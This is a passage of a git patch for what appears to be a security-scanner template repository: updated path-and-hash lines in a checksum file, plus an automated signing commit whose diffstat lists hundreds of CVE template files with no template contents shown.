+http/technologies/wordpress/plugins/wp-statistics.yaml:d1a9df96962c6e799ae8c62a7f1dc199f4971273 +http/technologies/wordpress/plugins/wp-super-cache.yaml:44597dbe9a7e287c20f07ea650f7d8aa8a02dcd6 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:d59c81c9d5003950cb34bb9673b6dd9f0eb7278c +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:0b3a728d5d83fc79d808e3e936b1ccd487aa1999 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:1aa26f290690a5e263bde467f8fea175fcf86ee4 +http/technologies/wordpress/plugins/wpforms-lite.yaml:b68ef67b12d7b5a48fd830c60743d7621055a872 +http/technologies/wordpress/plugins/wps-hide-login.yaml:88a07085b69fa6550b2c18ddbade0bf6bb2cdac1 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:7cbc8389efe9e2e92b7c113eceac8482ac8e8a42 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:f0b86d6e3b502ad7243fde4077efe438135ac8d5 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e162b2f96effc325b1b831f494c09f7aa6223715 http/technologies/wordpress-detect.yaml:937cc05d463b4e9d17c09fba39056fdbdb187056 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -6571,7 +6572,7 @@ http/token-spray/google-timezone.yaml:810190cf9c433c43ce6f551f29e6767f15f7412f http/token-spray/googlet-extsearchplaces.yaml:b136a266a5998ad603817d34d8bb0ce9599a9401 http/vulnerabilities/74cms/74cms-weixin-sqli.yaml:2d87bdfcd0dd6b777635096b6ff8ec5d1ca69559 http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml:496cc34d7d9b138c78b6a8779d8da8cb498b89a1 -http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:27bf0d285fcac5199584575a67065508ed69c6c8 +http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:888d647c16ed739cae18ea7d86c0ce0ef8604f4c http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:0a7ce14a72d4914f195dc3b2ed413f44bdc22ec5 http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:5e7e6e37c58c3416c48b2c4904c0509af3def15e http/vulnerabilities/apache/apache-solr-file-read.yaml:0a4ed215fe43e7fb4f0be607787a637a80773bb0 @@ -6777,7 +6778,7 @@ http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be http/vulnerabilities/other/easyimage-downphp-lfi.yaml:3fa0b55a93225ea14da76b59c62b982057714ae3 -http/vulnerabilities/other/ecology-oa-file-sqli.yaml:5623436279e98517acae0bded4d63d61b4045ccd +http/vulnerabilities/other/ecology-oa-file-sqli.yaml:8bbdebfe849fc09d48edcc23129f4437a039377f http/vulnerabilities/other/ecshop-sqli.yaml:665c8e1678762398162f054d117500affe7d4e48 http/vulnerabilities/other/ecsimagingpacs-rce.yaml:225ae97e89c774cfaff636a3f7f7115e1fd36ecf http/vulnerabilities/other/eibiz-lfi.yaml:cbf9aa62b6d93b0b8cc1ab70dd1fa1b7da422c9e @@ -7389,7 +7390,7 @@ network/cves/2020/CVE-2020-7247.yaml:8c4d9f68149de1747d403340b639460de856f7eb network/cves/2021/CVE-2021-44521.yaml:98c0ae75aaaf785fdc3fb6952027b509959571b5 network/cves/2022/CVE-2022-0543.yaml:46b2b79d679b0223ad99a49b92135ac7f59ef6ce network/cves/2022/CVE-2022-24706.yaml:0c5215095601865701d6a48ee18da810279ce48e -network/cves/2022/CVE-2022-31793.yaml:4adad38c77d5fa8f5a687000b13b87b916b21c61 +network/cves/2022/CVE-2022-31793.yaml:4ab8e096a9ada05f47dd8fce3e392a47c81146c8 network/cves/2023/CVE-2023-33246.yaml:28332ee6138694c0472a08cd9b271de51dd32dbd network/default-login/ftp-anonymous-login.yaml:da3402a791529b5521e14fceafe0f0084bb4c9d2 network/default-login/ftp-weak-credentials.yaml:1405ce162895ba2dcdaa7277e687a28a2ff40ce7 @@ -7518,7 +7519,7 @@ ssl/tls-version.yaml:07fa612fd325ec70b698e4a4e1c0d6e7a5a399bc ssl/untrusted-root-certificate.yaml:867f13cbcd5d5a3d8e1c25051b362bd33063d471 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:bb328ca0faafb012572b6102fe92094a78e38181 +templates-checksum.txt:6250cddead3796ecd29415dacc18f64eb2716998 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e86de9d1b1f4c75b6cd19afc5079b2121446bb7a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Nov 2023 15:16:28 +0000 Subject: [PATCH 30/36] Auto Template Signing [Fri Nov 3 15:16:27 UTC 2023] :robot: --- http/cves/2000/CVE-2000-0114.yaml | 3 +-- http/cves/2001/CVE-2001-0537.yaml | 3 +-- http/cves/2002/CVE-2002-1131.yaml | 3 +-- http/cves/2004/CVE-2004-0519.yaml | 3 +-- http/cves/2004/CVE-2004-1965.yaml | 3 +-- http/cves/2005/CVE-2005-2428.yaml | 3 +-- http/cves/2005/CVE-2005-3344.yaml | 3 +-- http/cves/2005/CVE-2005-3634.yaml | 3 +-- http/cves/2005/CVE-2005-4385.yaml | 3 +-- http/cves/2006/CVE-2006-1681.yaml | 3 +-- http/cves/2006/CVE-2006-2842.yaml | 3 +-- http/cves/2007/CVE-2007-0885.yaml | 3 +-- http/cves/2007/CVE-2007-4504.yaml | 3 +-- http/cves/2007/CVE-2007-4556.yaml | 3 +-- http/cves/2007/CVE-2007-5728.yaml | 3 +-- http/cves/2008/CVE-2008-1059.yaml | 3 +-- http/cves/2008/CVE-2008-1061.yaml | 3 +-- http/cves/2008/CVE-2008-1547.yaml | 3 +-- http/cves/2008/CVE-2008-2398.yaml | 3 +-- http/cves/2008/CVE-2008-2650.yaml | 3 +-- http/cves/2008/CVE-2008-4668.yaml | 3 +-- http/cves/2008/CVE-2008-4764.yaml | 3 +-- http/cves/2008/CVE-2008-5587.yaml | 3 +-- http/cves/2008/CVE-2008-6080.yaml | 3 +-- http/cves/2008/CVE-2008-6172.yaml | 3 +-- http/cves/2008/CVE-2008-6222.yaml | 3 +-- http/cves/2008/CVE-2008-6465.yaml | 3 +-- http/cves/2008/CVE-2008-6668.yaml | 3 +-- http/cves/2008/CVE-2008-6982.yaml | 3 +-- http/cves/2008/CVE-2008-7269.yaml | 3 +-- http/cves/2009/CVE-2009-0347.yaml | 3 +-- http/cves/2009/CVE-2009-0932.yaml | 3 +-- http/cves/2009/CVE-2009-1151.yaml | 3 +-- http/cves/2009/CVE-2009-1496.yaml | 3 +-- http/cves/2009/CVE-2009-1558.yaml | 3 +-- http/cves/2009/CVE-2009-1872.yaml | 3 +-- http/cves/2009/CVE-2009-2015.yaml | 3 +-- http/cves/2009/CVE-2009-2100.yaml | 3 +-- http/cves/2009/CVE-2009-3053.yaml | 3 +-- http/cves/2009/CVE-2009-3318.yaml | 3 +-- http/cves/2009/CVE-2009-4202.yaml | 3 +-- http/cves/2009/CVE-2009-4223.yaml | 3 +-- http/cves/2009/CVE-2009-4679.yaml | 3 +-- http/cves/2009/CVE-2009-5020.yaml | 3 +-- http/cves/2009/CVE-2009-5114.yaml | 3 +-- http/cves/2010/CVE-2010-0157.yaml | 3 +-- http/cves/2010/CVE-2010-0219.yaml | 3 +-- http/cves/2010/CVE-2010-0467.yaml | 3 +-- http/cves/2010/CVE-2010-0696.yaml | 3 +-- http/cves/2010/CVE-2010-0759.yaml | 3 +-- http/cves/2010/CVE-2010-0942.yaml | 3 +-- http/cves/2010/CVE-2010-0943.yaml | 3 +-- http/cves/2010/CVE-2010-0944.yaml | 3 +-- http/cves/2010/CVE-2010-0972.yaml | 3 +-- http/cves/2010/CVE-2010-0982.yaml | 3 +-- http/cves/2010/CVE-2010-0985.yaml | 3 +-- http/cves/2010/CVE-2010-1056.yaml | 3 +-- http/cves/2010/CVE-2010-1081.yaml | 3 +-- http/cves/2010/CVE-2010-1217.yaml | 3 +-- http/cves/2010/CVE-2010-1219.yaml | 3 +-- http/cves/2010/CVE-2010-1302.yaml | 3 +-- http/cves/2010/CVE-2010-1304.yaml | 3 +-- http/cves/2010/CVE-2010-1305.yaml | 3 +-- http/cves/2010/CVE-2010-1306.yaml | 3 +-- http/cves/2010/CVE-2010-1307.yaml | 3 +-- http/cves/2010/CVE-2010-1308.yaml | 3 +-- http/cves/2010/CVE-2010-1312.yaml | 3 +-- http/cves/2010/CVE-2010-1313.yaml | 3 +-- http/cves/2010/CVE-2010-1314.yaml | 3 +-- http/cves/2010/CVE-2010-1315.yaml | 3 +-- http/cves/2010/CVE-2010-1340.yaml | 3 +-- http/cves/2010/CVE-2010-1345.yaml | 3 +-- http/cves/2010/CVE-2010-1352.yaml | 3 +-- http/cves/2010/CVE-2010-1353.yaml | 3 +-- http/cves/2010/CVE-2010-1354.yaml | 3 +-- http/cves/2010/CVE-2010-1429.yaml | 3 +-- http/cves/2010/CVE-2010-1461.yaml | 3 +-- http/cves/2010/CVE-2010-1469.yaml | 3 +-- http/cves/2010/CVE-2010-1470.yaml | 3 +-- http/cves/2010/CVE-2010-1471.yaml | 3 +-- http/cves/2010/CVE-2010-1472.yaml | 3 +-- http/cves/2010/CVE-2010-1473.yaml | 3 +-- http/cves/2010/CVE-2010-1474.yaml | 3 +-- http/cves/2010/CVE-2010-1475.yaml | 3 +-- http/cves/2010/CVE-2010-1476.yaml | 3 +-- http/cves/2010/CVE-2010-1478.yaml | 3 +-- http/cves/2010/CVE-2010-1491.yaml | 3 +-- http/cves/2010/CVE-2010-1494.yaml | 3 +-- http/cves/2010/CVE-2010-1495.yaml | 3 +-- http/cves/2010/CVE-2010-1531.yaml | 3 +-- http/cves/2010/CVE-2010-1532.yaml | 3 +-- http/cves/2010/CVE-2010-1533.yaml | 3 +-- http/cves/2010/CVE-2010-1534.yaml | 3 +-- http/cves/2010/CVE-2010-1535.yaml | 3 +-- http/cves/2010/CVE-2010-1540.yaml | 3 +-- http/cves/2010/CVE-2010-1586.yaml | 3 +-- http/cves/2010/CVE-2010-1601.yaml | 3 +-- http/cves/2010/CVE-2010-1602.yaml | 3 +-- http/cves/2010/CVE-2010-1603.yaml | 3 +-- http/cves/2010/CVE-2010-1607.yaml | 3 +-- http/cves/2010/CVE-2010-1653.yaml | 3 +-- http/cves/2010/CVE-2010-1657.yaml | 3 +-- http/cves/2010/CVE-2010-1658.yaml | 3 +-- http/cves/2010/CVE-2010-1659.yaml | 3 +-- http/cves/2010/CVE-2010-1714.yaml | 3 +-- http/cves/2010/CVE-2010-1715.yaml | 3 +-- http/cves/2010/CVE-2010-1717.yaml | 3 +-- http/cves/2010/CVE-2010-1718.yaml | 3 +-- http/cves/2010/CVE-2010-1719.yaml | 3 +-- http/cves/2010/CVE-2010-1722.yaml | 3 +-- http/cves/2010/CVE-2010-1723.yaml | 3 +-- http/cves/2010/CVE-2010-1858.yaml | 3 +-- http/cves/2010/CVE-2010-1870.yaml | 3 +-- http/cves/2010/CVE-2010-1875.yaml | 3 +-- http/cves/2010/CVE-2010-1878.yaml | 3 +-- http/cves/2010/CVE-2010-1952.yaml | 3 +-- http/cves/2010/CVE-2010-1953.yaml | 3 +-- http/cves/2010/CVE-2010-1954.yaml | 3 +-- http/cves/2010/CVE-2010-1955.yaml | 3 +-- http/cves/2010/CVE-2010-1956.yaml | 3 +-- http/cves/2010/CVE-2010-1957.yaml | 3 +-- http/cves/2010/CVE-2010-1977.yaml | 3 +-- http/cves/2010/CVE-2010-1979.yaml | 3 +-- http/cves/2010/CVE-2010-1980.yaml | 3 +-- http/cves/2010/CVE-2010-1981.yaml | 3 +-- http/cves/2010/CVE-2010-1982.yaml | 3 +-- http/cves/2010/CVE-2010-1983.yaml | 3 +-- http/cves/2010/CVE-2010-2033.yaml | 3 +-- http/cves/2010/CVE-2010-2034.yaml | 3 +-- http/cves/2010/CVE-2010-2035.yaml | 3 +-- http/cves/2010/CVE-2010-2036.yaml | 3 +-- http/cves/2010/CVE-2010-2037.yaml | 3 +-- http/cves/2010/CVE-2010-2045.yaml | 3 +-- http/cves/2010/CVE-2010-2050.yaml | 3 +-- http/cves/2010/CVE-2010-2122.yaml | 3 +-- http/cves/2010/CVE-2010-2128.yaml | 3 +-- http/cves/2010/CVE-2010-2259.yaml | 3 +-- http/cves/2010/CVE-2010-2307.yaml | 3 +-- http/cves/2010/CVE-2010-2507.yaml | 3 +-- http/cves/2010/CVE-2010-2680.yaml | 3 +-- http/cves/2010/CVE-2010-2682.yaml | 3 +-- http/cves/2010/CVE-2010-2857.yaml | 3 +-- http/cves/2010/CVE-2010-2918.yaml | 3 +-- http/cves/2010/CVE-2010-2920.yaml | 3 +-- http/cves/2010/CVE-2010-3203.yaml | 3 +-- http/cves/2010/CVE-2010-3426.yaml | 3 +-- http/cves/2010/CVE-2010-4231.yaml | 3 +-- http/cves/2010/CVE-2010-4239.yaml | 3 +-- http/cves/2010/CVE-2010-4282.yaml | 3 +-- http/cves/2010/CVE-2010-4617.yaml | 3 +-- http/cves/2010/CVE-2010-4719.yaml | 3 +-- http/cves/2010/CVE-2010-4769.yaml | 3 +-- http/cves/2010/CVE-2010-4977.yaml | 3 +-- http/cves/2010/CVE-2010-5028.yaml | 3 +-- http/cves/2010/CVE-2010-5278.yaml | 3 +-- http/cves/2010/CVE-2010-5286.yaml | 3 +-- http/cves/2011/CVE-2011-0049.yaml | 3 +-- http/cves/2011/CVE-2011-1669.yaml | 3 +-- http/cves/2011/CVE-2011-2744.yaml | 3 +-- http/cves/2011/CVE-2011-2780.yaml | 3 +-- http/cves/2011/CVE-2011-4336.yaml | 3 +-- http/cves/2011/CVE-2011-4618.yaml | 3 +-- http/cves/2011/CVE-2011-4624.yaml | 3 +-- http/cves/2011/CVE-2011-4804.yaml | 3 +-- http/cves/2011/CVE-2011-4926.yaml | 3 +-- http/cves/2011/CVE-2011-5106.yaml | 3 +-- http/cves/2011/CVE-2011-5107.yaml | 3 +-- http/cves/2011/CVE-2011-5179.yaml | 3 +-- http/cves/2011/CVE-2011-5181.yaml | 3 +-- http/cves/2011/CVE-2011-5252.yaml | 3 +-- http/cves/2011/CVE-2011-5265.yaml | 3 +-- http/cves/2012/CVE-2012-0392.yaml | 3 +-- http/cves/2012/CVE-2012-0394.yaml | 3 +-- http/cves/2012/CVE-2012-0896.yaml | 3 +-- http/cves/2012/CVE-2012-0901.yaml | 3 +-- http/cves/2012/CVE-2012-0981.yaml | 3 +-- http/cves/2012/CVE-2012-0991.yaml | 3 +-- http/cves/2012/CVE-2012-0996.yaml | 3 +-- http/cves/2012/CVE-2012-1226.yaml | 3 +-- http/cves/2012/CVE-2012-1823.yaml | 3 +-- http/cves/2012/CVE-2012-1835.yaml | 3 +-- http/cves/2012/CVE-2012-2371.yaml | 3 +-- http/cves/2012/CVE-2012-3153.yaml | 3 +-- http/cves/2012/CVE-2012-4032.yaml | 3 +-- http/cves/2012/CVE-2012-4242.yaml | 3 +-- http/cves/2012/CVE-2012-4253.yaml | 3 +-- http/cves/2012/CVE-2012-4273.yaml | 3 +-- http/cves/2012/CVE-2012-4547.yaml | 3 +-- http/cves/2012/CVE-2012-4768.yaml | 3 +-- http/cves/2012/CVE-2012-4878.yaml | 3 +-- http/cves/2012/CVE-2012-4889.yaml | 3 +-- http/cves/2012/CVE-2012-4940.yaml | 3 +-- http/cves/2012/CVE-2012-4982.yaml | 3 +-- http/cves/2012/CVE-2012-5321.yaml | 3 +-- http/cves/2012/CVE-2012-5913.yaml | 3 +-- http/cves/2012/CVE-2012-6499.yaml | 3 +-- http/cves/2013/CVE-2013-1965.yaml | 3 +-- http/cves/2013/CVE-2013-2287.yaml | 3 +-- http/cves/2013/CVE-2013-2621.yaml | 3 +-- http/cves/2013/CVE-2013-3526.yaml | 3 +-- http/cves/2013/CVE-2013-3827.yaml | 3 +-- http/cves/2013/CVE-2013-4117.yaml | 3 +-- http/cves/2013/CVE-2013-4625.yaml | 3 +-- http/cves/2013/CVE-2013-5528.yaml | 3 +-- http/cves/2013/CVE-2013-5979.yaml | 3 +-- http/cves/2013/CVE-2013-6281.yaml | 3 +-- http/cves/2013/CVE-2013-7240.yaml | 3 +-- http/cves/2013/CVE-2013-7285.yaml | 3 +-- http/cves/2014/CVE-2014-10037.yaml | 3 +-- http/cves/2014/CVE-2014-1203.yaml | 3 +-- http/cves/2014/CVE-2014-2321.yaml | 3 +-- http/cves/2014/CVE-2014-2383.yaml | 3 +-- http/cves/2014/CVE-2014-2908.yaml | 3 +-- http/cves/2014/CVE-2014-2962.yaml | 3 +-- http/cves/2014/CVE-2014-3120.yaml | 3 +-- http/cves/2014/CVE-2014-3206.yaml | 3 +-- http/cves/2014/CVE-2014-3744.yaml | 3 +-- http/cves/2014/CVE-2014-4210.yaml | 3 +-- http/cves/2014/CVE-2014-4513.yaml | 3 +-- http/cves/2014/CVE-2014-4535.yaml | 3 +-- http/cves/2014/CVE-2014-4536.yaml | 3 +-- http/cves/2014/CVE-2014-4539.yaml | 3 +-- http/cves/2014/CVE-2014-4544.yaml | 3 +-- http/cves/2014/CVE-2014-4550.yaml | 3 +-- http/cves/2014/CVE-2014-4558.yaml | 3 +-- http/cves/2014/CVE-2014-4561.yaml | 3 +-- http/cves/2014/CVE-2014-4592.yaml | 3 +-- http/cves/2014/CVE-2014-4940.yaml | 3 +-- http/cves/2014/CVE-2014-4942.yaml | 3 +-- http/cves/2014/CVE-2014-5111.yaml | 3 +-- http/cves/2014/CVE-2014-5258.yaml | 3 +-- http/cves/2014/CVE-2014-5368.yaml | 3 +-- http/cves/2014/CVE-2014-6308.yaml | 3 +-- http/cves/2014/CVE-2014-8676.yaml | 3 +-- http/cves/2014/CVE-2014-8682.yaml | 3 +-- http/cves/2014/CVE-2014-8799.yaml | 3 +-- http/cves/2014/CVE-2014-9094.yaml | 3 +-- http/cves/2014/CVE-2014-9119.yaml | 3 +-- http/cves/2014/CVE-2014-9180.yaml | 3 +-- http/cves/2014/CVE-2014-9444.yaml | 3 +-- http/cves/2014/CVE-2014-9606.yaml | 3 +-- http/cves/2014/CVE-2014-9607.yaml | 3 +-- http/cves/2014/CVE-2014-9608.yaml | 3 +-- http/cves/2014/CVE-2014-9609.yaml | 3 +-- http/cves/2014/CVE-2014-9614.yaml | 3 +-- http/cves/2014/CVE-2014-9615.yaml | 3 +-- http/cves/2014/CVE-2014-9617.yaml | 3 +-- http/cves/2014/CVE-2014-9618.yaml | 3 +-- http/cves/2015/CVE-2015-0554.yaml | 3 +-- http/cves/2015/CVE-2015-1000005.yaml | 3 +-- http/cves/2015/CVE-2015-1000010.yaml | 3 +-- http/cves/2015/CVE-2015-1000012.yaml | 3 +-- http/cves/2015/CVE-2015-1427.yaml | 3 +-- http/cves/2015/CVE-2015-1503.yaml | 3 +-- http/cves/2015/CVE-2015-1579.yaml | 3 +-- http/cves/2015/CVE-2015-1880.yaml | 3 +-- http/cves/2015/CVE-2015-2067.yaml | 3 +-- http/cves/2015/CVE-2015-2068.yaml | 3 +-- http/cves/2015/CVE-2015-2080.yaml | 3 +-- http/cves/2015/CVE-2015-2166.yaml | 3 +-- http/cves/2015/CVE-2015-2196.yaml | 3 +-- http/cves/2015/CVE-2015-2755.yaml | 3 +-- http/cves/2015/CVE-2015-2807.yaml | 3 +-- http/cves/2015/CVE-2015-2863.yaml | 3 +-- http/cves/2015/CVE-2015-2996.yaml | 3 +-- http/cves/2015/CVE-2015-3035.yaml | 3 +-- http/cves/2015/CVE-2015-3224.yaml | 3 +-- http/cves/2015/CVE-2015-3337.yaml | 3 +-- http/cves/2015/CVE-2015-3648.yaml | 3 +-- http/cves/2015/CVE-2015-3897.yaml | 3 +-- http/cves/2015/CVE-2015-4050.yaml | 3 +-- http/cves/2015/CVE-2015-4062.yaml | 3 +-- http/cves/2015/CVE-2015-4063.yaml | 3 +-- http/cves/2015/CVE-2015-4074.yaml | 3 +-- http/cves/2015/CVE-2015-4127.yaml | 3 +-- http/cves/2015/CVE-2015-4414.yaml | 3 +-- http/cves/2015/CVE-2015-4632.yaml | 3 +-- http/cves/2015/CVE-2015-4666.yaml | 3 +-- http/cves/2015/CVE-2015-4668.yaml | 3 +-- http/cves/2015/CVE-2015-4694.yaml | 3 +-- http/cves/2015/CVE-2015-5354.yaml | 3 +-- http/cves/2015/CVE-2015-5461.yaml | 3 +-- http/cves/2015/CVE-2015-5469.yaml | 3 +-- http/cves/2015/CVE-2015-5471.yaml | 3 +-- http/cves/2015/CVE-2015-5531.yaml | 3 +-- http/cves/2015/CVE-2015-5688.yaml | 3 +-- http/cves/2015/CVE-2015-6477.yaml | 3 +-- http/cves/2015/CVE-2015-6544.yaml | 3 +-- http/cves/2015/CVE-2015-6920.yaml | 3 +-- http/cves/2015/CVE-2015-7245.yaml | 3 +-- http/cves/2015/CVE-2015-7377.yaml | 3 +-- http/cves/2015/CVE-2015-7450.yaml | 3 +-- http/cves/2015/CVE-2015-7780.yaml | 3 +-- http/cves/2015/CVE-2015-7823.yaml | 3 +-- http/cves/2015/CVE-2015-8349.yaml | 3 +-- http/cves/2015/CVE-2015-8813.yaml | 3 +-- http/cves/2015/CVE-2015-9312.yaml | 3 +-- http/cves/2015/CVE-2015-9323.yaml | 3 +-- http/cves/2015/CVE-2015-9414.yaml | 3 +-- http/cves/2015/CVE-2015-9480.yaml | 3 +-- http/cves/2016/CVE-2016-0957.yaml | 3 +-- http/cves/2016/CVE-2016-1000126.yaml | 3 +-- http/cves/2016/CVE-2016-1000127.yaml | 3 +-- http/cves/2016/CVE-2016-1000128.yaml | 3 +-- http/cves/2016/CVE-2016-1000129.yaml | 3 +-- http/cves/2016/CVE-2016-1000130.yaml | 3 +-- http/cves/2016/CVE-2016-1000131.yaml | 3 +-- http/cves/2016/CVE-2016-1000132.yaml | 3 +-- http/cves/2016/CVE-2016-1000133.yaml | 3 +-- http/cves/2016/CVE-2016-1000134.yaml | 3 +-- http/cves/2016/CVE-2016-1000135.yaml | 3 +-- http/cves/2016/CVE-2016-1000136.yaml | 3 +-- http/cves/2016/CVE-2016-1000137.yaml | 3 +-- http/cves/2016/CVE-2016-1000138.yaml | 3 +-- http/cves/2016/CVE-2016-1000139.yaml | 3 +-- http/cves/2016/CVE-2016-1000140.yaml | 3 +-- http/cves/2016/CVE-2016-1000141.yaml | 3 +-- http/cves/2016/CVE-2016-1000142.yaml | 3 +-- http/cves/2016/CVE-2016-1000143.yaml | 3 +-- http/cves/2016/CVE-2016-1000146.yaml | 3 +-- http/cves/2016/CVE-2016-1000148.yaml | 3 +-- http/cves/2016/CVE-2016-1000149.yaml | 3 +-- http/cves/2016/CVE-2016-1000152.yaml | 3 +-- http/cves/2016/CVE-2016-1000153.yaml | 3 +-- http/cves/2016/CVE-2016-1000154.yaml | 3 +-- http/cves/2016/CVE-2016-1000155.yaml | 3 +-- http/cves/2016/CVE-2016-10033.yaml | 3 +-- http/cves/2016/CVE-2016-10108.yaml | 3 +-- http/cves/2016/CVE-2016-10134.yaml | 3 +-- http/cves/2016/CVE-2016-10367.yaml | 3 +-- http/cves/2016/CVE-2016-10368.yaml | 3 +-- http/cves/2016/CVE-2016-10924.yaml | 3 +-- http/cves/2016/CVE-2016-10940.yaml | 3 +-- http/cves/2016/CVE-2016-10956.yaml | 3 +-- http/cves/2016/CVE-2016-10960.yaml | 3 +-- http/cves/2016/CVE-2016-10973.yaml | 3 +-- http/cves/2016/CVE-2016-10993.yaml | 3 +-- http/cves/2016/CVE-2016-1555.yaml | 3 +-- http/cves/2016/CVE-2016-2389.yaml | 3 +-- http/cves/2016/CVE-2016-3088.yaml | 3 +-- http/cves/2016/CVE-2016-3978.yaml | 3 +-- http/cves/2016/CVE-2016-4437.yaml | 3 +-- http/cves/2016/CVE-2016-4975.yaml | 3 +-- http/cves/2016/CVE-2016-4977.yaml | 3 +-- http/cves/2016/CVE-2016-5649.yaml | 3 +-- http/cves/2016/CVE-2016-6195.yaml | 3 +-- http/cves/2016/CVE-2016-6277.yaml | 3 +-- http/cves/2016/CVE-2016-7834.yaml | 3 +-- http/cves/2016/CVE-2016-7981.yaml | 3 +-- http/cves/2016/CVE-2016-8527.yaml | 3 +-- http/cves/2017/CVE-2017-0929.yaml | 3 +-- http/cves/2017/CVE-2017-1000029.yaml | 3 +-- http/cves/2017/CVE-2017-1000163.yaml | 3 +-- http/cves/2017/CVE-2017-1000170.yaml | 3 +-- http/cves/2017/CVE-2017-1000486.yaml | 3 +-- http/cves/2017/CVE-2017-10075.yaml | 3 +-- http/cves/2017/CVE-2017-10974.yaml | 3 +-- http/cves/2017/CVE-2017-11165.yaml | 3 +-- http/cves/2017/CVE-2017-11444.yaml | 3 +-- http/cves/2017/CVE-2017-11512.yaml | 3 +-- http/cves/2017/CVE-2017-11586.yaml | 3 +-- http/cves/2017/CVE-2017-11629.yaml | 3 +-- http/cves/2017/CVE-2017-12138.yaml | 3 +-- http/cves/2017/CVE-2017-12542.yaml | 3 +-- http/cves/2017/CVE-2017-12544.yaml | 3 +-- http/cves/2017/CVE-2017-12583.yaml | 3 +-- http/cves/2017/CVE-2017-12615.yaml | 3 +-- http/cves/2017/CVE-2017-12617.yaml | 3 +-- http/cves/2017/CVE-2017-12637.yaml | 3 +-- http/cves/2017/CVE-2017-12794.yaml | 3 +-- http/cves/2017/CVE-2017-14135.yaml | 3 +-- http/cves/2017/CVE-2017-14186.yaml | 3 +-- http/cves/2017/CVE-2017-14524.yaml | 3 +-- http/cves/2017/CVE-2017-14535.yaml | 3 +-- http/cves/2017/CVE-2017-14537.yaml | 3 +-- http/cves/2017/CVE-2017-14622.yaml | 3 +-- http/cves/2017/CVE-2017-14651.yaml | 3 +-- http/cves/2017/CVE-2017-14849.yaml | 3 +-- http/cves/2017/CVE-2017-15287.yaml | 3 +-- http/cves/2017/CVE-2017-15363.yaml | 3 +-- http/cves/2017/CVE-2017-15647.yaml | 3 +-- http/cves/2017/CVE-2017-15715.yaml | 3 +-- http/cves/2017/CVE-2017-16806.yaml | 3 +-- http/cves/2017/CVE-2017-16877.yaml | 3 +-- http/cves/2017/CVE-2017-16894.yaml | 3 +-- http/cves/2017/CVE-2017-17043.yaml | 3 +-- http/cves/2017/CVE-2017-17059.yaml | 3 +-- http/cves/2017/CVE-2017-17451.yaml | 3 +-- http/cves/2017/CVE-2017-17731.yaml | 3 +-- http/cves/2017/CVE-2017-17736.yaml | 3 +-- http/cves/2017/CVE-2017-18024.yaml | 3 +-- http/cves/2017/CVE-2017-18487.yaml | 3 +-- http/cves/2017/CVE-2017-18490.yaml | 3 +-- http/cves/2017/CVE-2017-18491.yaml | 3 +-- http/cves/2017/CVE-2017-18492.yaml | 3 +-- http/cves/2017/CVE-2017-18493.yaml | 3 +-- http/cves/2017/CVE-2017-18494.yaml | 3 +-- http/cves/2017/CVE-2017-18496.yaml | 3 +-- http/cves/2017/CVE-2017-18500.yaml | 3 +-- http/cves/2017/CVE-2017-18501.yaml | 3 +-- http/cves/2017/CVE-2017-18502.yaml | 3 +-- http/cves/2017/CVE-2017-18505.yaml | 3 +-- http/cves/2017/CVE-2017-18516.yaml | 3 +-- http/cves/2017/CVE-2017-18517.yaml | 3 +-- http/cves/2017/CVE-2017-18518.yaml | 3 +-- http/cves/2017/CVE-2017-18527.yaml | 3 +-- http/cves/2017/CVE-2017-18528.yaml | 3 +-- http/cves/2017/CVE-2017-18529.yaml | 3 +-- http/cves/2017/CVE-2017-18530.yaml | 3 +-- http/cves/2017/CVE-2017-18532.yaml | 3 +-- http/cves/2017/CVE-2017-18536.yaml | 3 +-- http/cves/2017/CVE-2017-18537.yaml | 3 +-- http/cves/2017/CVE-2017-18542.yaml | 3 +-- http/cves/2017/CVE-2017-18556.yaml | 3 +-- http/cves/2017/CVE-2017-18557.yaml | 3 +-- http/cves/2017/CVE-2017-18558.yaml | 3 +-- http/cves/2017/CVE-2017-18562.yaml | 3 +-- http/cves/2017/CVE-2017-18564.yaml | 3 +-- http/cves/2017/CVE-2017-18565.yaml | 3 +-- http/cves/2017/CVE-2017-18566.yaml | 3 +-- http/cves/2017/CVE-2017-18598.yaml | 3 +-- http/cves/2017/CVE-2017-18638.yaml | 3 +-- http/cves/2017/CVE-2017-3506.yaml | 3 +-- http/cves/2017/CVE-2017-3528.yaml | 3 +-- http/cves/2017/CVE-2017-4011.yaml | 3 +-- http/cves/2017/CVE-2017-5521.yaml | 3 +-- http/cves/2017/CVE-2017-5631.yaml | 3 +-- http/cves/2017/CVE-2017-5982.yaml | 3 +-- http/cves/2017/CVE-2017-7269.yaml | 3 +-- http/cves/2017/CVE-2017-7391.yaml | 3 +-- http/cves/2017/CVE-2017-7615.yaml | 3 +-- http/cves/2017/CVE-2017-7921.yaml | 3 +-- http/cves/2017/CVE-2017-7925.yaml | 3 +-- http/cves/2017/CVE-2017-8229.yaml | 3 +-- http/cves/2017/CVE-2017-9140.yaml | 3 